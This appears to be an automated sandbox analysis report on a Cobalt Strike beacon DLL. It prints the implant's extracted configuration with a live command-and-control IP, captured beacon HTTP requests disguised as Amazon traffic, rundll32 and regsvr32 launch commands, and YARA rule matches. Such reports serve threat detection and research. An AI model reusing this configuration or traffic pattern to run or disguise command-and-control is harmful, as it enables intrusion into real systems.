Source: 8082-x64.dll.dll |
ReversingLabs: Detection: 78% |
Source: 8082-x64.dll.dll |
Virustotal: Detection: 63% |
Perma Link |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp |
Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""} |
Source: Malware configuration extractor |
URLs: 20.104.209.69 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49701 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49701 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49709 |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MzM0ODIwMjEyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14587Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
TCP traffic: 192.168.2.5:49699 -> 20.104.209.69:8082 |
Source: Joe Sandbox View |
ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS |
Source: Joe Sandbox View |
IP Address: 20.104.209.69 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod |
Source: loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast |
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast(( |
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast2 |
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast? |
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcastp |
Source: loaddll64.exe, 00000000.00000002.579668975.0000026760402000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579895773.00000267605C1000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579889103.0000026760597000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8 |
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.amazon.com |
Source: unknown |
HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MzM0ODIwMjEyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14587Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Rule for beacon reflective loader Author: unknown |
Source: 8082-x64.dll.dll, type: SAMPLE |
Matched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44 |
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9 |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13 |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13 |
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: 8082-x64.dll.dll |
Static PE information: Number of sections : 11 > 10 |
Source: 8082-x64.dll.dll |
ReversingLabs: Detection: 78% |
Source: 8082-x64.dll.dll |
Virustotal: Detection: 63% |
Source: 8082-x64.dll.dll |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll64.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
Source: unknown |
Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\8082-x64.dll.dll" |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllGetClassObject |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllMain |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllGetClassObject |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllMain |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllRegisterServer |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01 |
Source: classification engine |
Classification label: mal100.troj.winDLL@14/0@0/1 |
Source: 8082-x64.dll.dll |
Static PE information: Image base 0x6bac0000 > 0x60000000 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760595E1A push ecx; ret |
0_3_0000026760595E2D |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760596786 push ebx; ret |
0_3_0000026760596794 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760596726 push ebx; ret |
0_3_0000026760596794 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760595795 push eax; ret |
0_3_00000267605957A4 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605957C3 push eax; ret |
0_3_00000267605957A4 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605978FA push ecx; ret |
0_3_0000026760597918 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594167 push esi; ret |
0_3_000002676059416C |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_000002676059625F push ebp; ret |
0_3_0000026760596263 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605972C8 push ebx; ret |
0_3_00000267605972E8 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594AC9 push esp; ret |
0_3_0000026760594AD2 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760595AEF push edx; ret |
0_3_0000026760595AB8 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605972EB push esp; ret |
0_3_000002676059731C |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594C00 push esi; ret |
0_3_0000026760594C09 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594480 push edx; ret |
0_3_0000026760594498 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760598469 push es; ret |
0_3_0000026760598470 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760598498 push ebp; ret |
0_3_000002676059849F |
Source: 8082-x64.dll.dll |
Static PE information: section name: .xdata |
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49701 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49701 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49709 |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe TID: 3724 |
Thread sleep time: -120000s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe TID: 5220 |
Thread sleep time: -32461s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe TID: 5220 |
Thread sleep time: -37737s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe TID: 5220 |
Thread sleep time: -34501s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\loaddll64.exe |
Process information queried: ProcessInformation |
Jump to behavior |
Source: C:\Windows\System32\loaddll64.exe |
Thread delayed: delay time: 120000 |
Jump to behavior |
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWDO=: |
